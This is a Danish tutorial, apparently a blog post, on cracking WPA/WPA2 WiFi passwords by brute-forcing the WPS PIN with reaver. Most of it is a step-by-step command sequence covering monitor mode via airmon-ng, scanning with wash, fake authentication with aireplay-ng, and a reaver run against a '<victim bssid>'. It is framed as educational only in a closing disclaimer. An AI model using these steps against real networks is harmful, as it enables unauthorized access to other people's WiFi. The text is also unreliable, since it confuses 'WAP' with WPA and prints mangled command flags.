Vi ved alle, at de fleste mennesker foretrækker at sætte et WiFi password til deres trådløse forbindelse. Dette kan være så simpelt som 12345 eller så komplekst som en kombination af flere bogstaver, tal og tegn. Nå, men her er de dårlige nyheder, der findes et værktøj ved navn reaver, som kan bruges til at knække din WAP/WAP2 WiFi-adgangskode.
Om WEP, WAP og WAP2
For at forbedre funktionerne i WEP (Wired Equivalent Privacy) blev WiFi Protected Access eller WPA oprettet i 2003. Denne midlertidige forbedring har stadig en forholdsvis dårlig sikkerhed, men er lettere at konfigurere. WPA anvender TKIP (Temporal Key Integrity Protocol) til sikrere kryptering end WEP.
Et år senere, i 2004, blev WiFi Protected Access 2 tilgængelig. WPA2 har stærkere sikkerhed og er nemmere at konfigurere end de tidligere muligheder. Hovedforskellen ved WPA2 er, at den bruger Advanced Encryption Standard (AES) i stedet for TKIP.
Hvad du skal bruge.
- En WiFi-adapter, der understøtter monitortilstand
- En computer med WiFi
- Et WPA-sikret WiFi-netværk i nærheden
- Reaver installeret
- Persistence
Jeg går ud fra, at din router er konfigureret til ikke at bruge Push Button Authentication.(PBC)
Lad os gøre dette
Først skal du, hvis du bruger en virtuel maskine, aktivere din USB-controller ved at gå til indstillingerne, klik derefter på USB, og vælg din USB-enhed.
NB: Sørg for, at den trådløse adapter, du bruger, understøtter monitortilstand.
Derpå skal du køre følgende kommando:
iwconfig
Denne kommando viser dig kun trådløse grænseflader
Kør:
sudo ifconfig wlan0 down
Dette deaktiverer WiFi
Så:
sudo airmon-ng check kill
Denne kommando dræber enhver proces, der kan forstyrre brugen af min grænseflade i monitortilstand. Den dræber netværksadministratoren, så der ikke er noget internet.
Kør derefter:
iwconfig wlan0 mode monitor
Denne kommando ændrer tilstanden fra administreret tilstand til monitortilstand.
Managed mode er standardtilstanden for alle trådløse enheder.
Grunden til, at vi skal ændre tilstanden fra managed til monitor mode, er, at vi ikke kun ønsker at opfange de pakker, der har mac-adressen til vores enhed, men alle pakker, selv dem, der sendes til routeren og andre enheder. Dette er kun muligt, når WiFi-adapteren er i monitor-tilstand.
Så kører du:
sudo ifconfig wlan0 up
Dette bringer wifi’en op igen.
Så kører du:
iwconfig
Dette er for at kontrollere, om vores tilstand er ændret fra managed til monitor. Hvis den gjorde det, skal det angives i terminalen.
Figuren nedenfor viser, at tilstanden er ændret til monitor.
wash - interface wlan0
Dette viser alle WPS-aktiverede Aps, der bruger trådløs grænseflade.
Aireplay-ng - fakeauth 30 -a<bssid> -h <macid> wlan0
For mac ID open a new tab and type ifconfig. Kopier de første 12 cifre fra unspec i wlan0.
Tryk ikke på ENTER endnu.
Åbn en anden ny fane.
Sørg for, at du har reaver installeret. Hvis du ikke har det, skal du køre følgende kommando.
Sudo apt-get install aircrack-ng reaver
Dette vil installere reaver.
Reaver brute force pin’en og forbinder den med målet, og når den har pin’en, bruger den den til at beregne den faktiske WAP/WAP2-nøgle.
Kør derefter følgende kommando:
Reaver - bssid<victim bssid> - channel <the channel of the victim> - interface wlan0 –vvv - no-associate
Tryk enter på denne fane, og tryk også enter på den anden fane, som jeg sagde, at du ikke skulle trykke enter.
Dette burde tage et par minutter, da den prøver alle mulige kombinationer, og til sidst vil den give dig WPS-pin, WAP-adgangskoden og navnet på Wi-Fi
DISCLAIMER. Denne artikel er til læringsformål, vi er ikke ansvarlige for eventuelle skader forårsaget ved henvisning til den.
Artikel af Restercuter Nyawira, et SheHacks KE-medlem, træner og cybersikkerhedsentusiast. Find hende på LinkedIn (Restercuter Nyawira) og Twitter @Restercuter1.